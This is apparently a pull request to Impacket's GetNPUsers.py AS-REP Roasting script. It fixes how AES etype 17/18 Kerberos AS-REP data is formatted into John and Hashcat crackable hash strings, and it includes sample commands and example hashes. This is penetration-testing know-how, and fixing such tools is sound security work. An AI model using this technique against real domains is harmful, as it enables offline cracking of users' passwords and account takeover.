### PR TITLE
GetNPUsers.py: Fixed incorrectly formatted output hashes for AES128/256 (etype 17/18) AS-REPs

### DIFF
--- a/examples/GetNPUsers.py
+++ b/examples/GetNPUsers.py
@@ -195,16 +195,31 @@ class GetUserNoPreAuth:
             # The user doesn't have UF_DONT_REQUIRE_PREAUTH set
             raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)
 
+        # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
         if self.__outputFormat == 'john':
-            # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
-            return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
-                                               hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
-                                               hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
-        else:
-            # Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
-            return '$krb5asrep$%d$%s@%s:%s$%s' % ( asRep['enc-part']['etype'], clientName, domain,
+            # Check what type of encryption is used for the enc-part data
+            # This will inform how the hash output needs to be formatted
+            if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
+                return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode(),
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode())
+            else:
+                return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
                                                    hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
                                                    hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
+        
+        # Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
+        else:
+            # Check what type of encryption is used for the enc-part data
+            # This will inform how the hash output needs to be formatted
+            if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
+                return '$krb5asrep$%d$%s$%s$%s$%s' % (asRep['enc-part']['etype'], clientName, domain,
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode(),
+                                                     hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode())
+            else:
+                return '$krb5asrep$%d$%s@%s:%s$%s' % (asRep['enc-part']['etype'], clientName, domain,
+                                                      hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
+                                                      hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())
 
     @staticmethod
     def outputTGT(entry, fd=None):


### PR DESCRIPTION
The GetNPUsers.py AS-REP Roasting script wasn't formatting the output correctly for AS-REPs that use AES128/256 encryption types (etype 17/18), for both Hashcat and John output formats. This pull request corrects those output formats.

Example output for AES256 AS-REP in John format, before the fix:
```
$ python3 GetNPUsers.py example.com/user -dc-ip x.x.x.x -request -format john
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Cannot authenticate user, getting its TGT
$krb5asrep$user@EXAMPLE.COM:ccc4553256f8d6863eca64ea30e582d2$a61a230f5c9613883d43301986892fd92b6fdfc61d030a2d3aa1afe2737a7676e7da720a8e508ce3bd27c5337572586ff3fe0fc51f1cf6c188e89bc433c198a907dbc4d0412bb701eeccd4b836e3588b2e6b6dc3c87a17221e8f30ce8e5bda4ecb224cca842ee06025d1be0a56dee96433d71ec47772029f3dbdf367e8e3c36771b621b41158ab2dc5935ec832ff4575e829ea1d4402da548eb9e8ef04c5f4a022d5d3104b45150d20e0ce0c537de0894c05bf07440a3bbcb6c8156967464f4a995105b7b5d77f44c761d4a7422d8485b831b64124695adefb8b5217c5331ba7094a8ee5cfde2e046bdc6f0c8fdcfb4f316a19c44bad5dc449bf0a51c1c6
```

It's got all the right data, but it looked like it was formatting the hash as if it was RC4 (etype 23). E.g. it's taking the first 32 characters as the checksum instead of the last 24, and the user name and domain name need to be in a different format.

According to the comments and test hashes in the source code for [John's AS-REP Roasting module](https://github.com/openwall/john/blob/bleeding-jumbo/src/krb5_asrep_fmt_plug.c), the correct hash format for etype 18 is `$krb5asrep$18$salt$edata2$checksum`. When I reformatted the above hash to match this format, it cracked successfully in John (for reference, the password for this example hash is "hashcat"). The corrected hash would be this:
```
$krb5asrep$18$EXAMPLE.COMuser$ccc4553256f8d6863eca64ea30e582d2a61a230f5c9613883d43301986892fd92b6fdfc61d030a2d3aa1afe2737a7676e7da720a8e508ce3bd27c5337572586ff3fe0fc51f1cf6c188e89bc433c198a907dbc4d0412bb701eeccd4b836e3588b2e6b6dc3c87a17221e8f30ce8e5bda4ecb224cca842ee06025d1be0a56dee96433d71ec47772029f3dbdf367e8e3c36771b621b41158ab2dc5935ec832ff4575e829ea1d4402da548eb9e8ef04c5f4a022d5d3104b45150d20e0ce0c537de0894c05bf07440a3bbcb6c8156967464f4a995105b7b5d77f44c761d4a7422d8485b831b64124695adefb8b5217c5331ba7094a8ee5cfde2e046bdc6f0c8fdcfb4f316a$19c44bad5dc449bf0a51c1c6
```

The Hashcat output looked very similar, here's an example of the output before the fix:
```
$ python3 GetNPUsers.py example.com/user -dc-ip x.x.x.x -request -format hashcat
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Cannot authenticate user, getting its TGT
$krb5asrep$18$user@EXAMPLE.COM:bde521de05cacdcdf0a073f3e3f8c52e$23a7662ff6849a22b054b72667ab1b74882c5a4c1ddf240db1b84a1494d5b6ce4264b3bc2451737eb0043fdd9db546c6452deb9fc77dfeac7b2c5772fc8658646c98145903c0e48cfcc36774bce23b2d52f54412756ba975cdd8baf9e62637c7c7b065c0c77326a4ac702110d3f1750b178a27f844904996c79316b6d8c1ae8d20d8edfd9875378a9318d7dca8b1c5523cf86f8412bb327503f49718e0a66ce3933a0ee19f0192090c8e266714bced7f9625b64e5a96f2943181f2e8b61fe1ff852558750c8951ed94b9331a98ee78945171b7721ed8835fe2b91a8778fdaccf79f6e9510e589babc9407a7074b954454db31b5aa409a9e595e7f0098ccc
```

Hashcat doesn't actually support AES for AS-REPs yet, but I've submitted a pull request (hashcat/hashcat#3729) for that and I'm going to use a hash format that's similar to Hashcat's other Kerberos AES formats. The proposed hash format is `$krb5asrep$18$user$realm$checksum$edata2`, very similar to the TGS-REP etype 18 hash, so the corrected hash would be:
```
$krb5asrep$18$user$EXAMPLE.COM$1b5aa409a9e595e7f0098ccc$bde521de05cacdcdf0a073f3e3f8c52e23a7662ff6849a22b054b72667ab1b74882c5a4c1ddf240db1b84a1494d5b6ce4264b3bc2451737eb0043fdd9db546c6452deb9fc77dfeac7b2c5772fc8658646c98145903c0e48cfcc36774bce23b2d52f54412756ba975cdd8baf9e62637c7c7b065c0c77326a4ac702110d3f1750b178a27f844904996c79316b6d8c1ae8d20d8edfd9875378a9318d7dca8b1c5523cf86f8412bb327503f49718e0a66ce3933a0ee19f0192090c8e266714bced7f9625b64e5a96f2943181f2e8b61fe1ff852558750c8951ed94b9331a98ee78945171b7721ed8835fe2b91a8778fdaccf79f6e9510e589babc9407a7074b954454db3
```

I've only included examples for etype 18 here, since etype 17 is obviously very similar.

The code in this pull request checks what the encryption type is for the `enc-part` data, and then formats the output accordingly. The output for etype 23 hashes will still be the same, but etype 17/18 will now be different, matching the corrected hashes shown above. But I can also include example output if needed.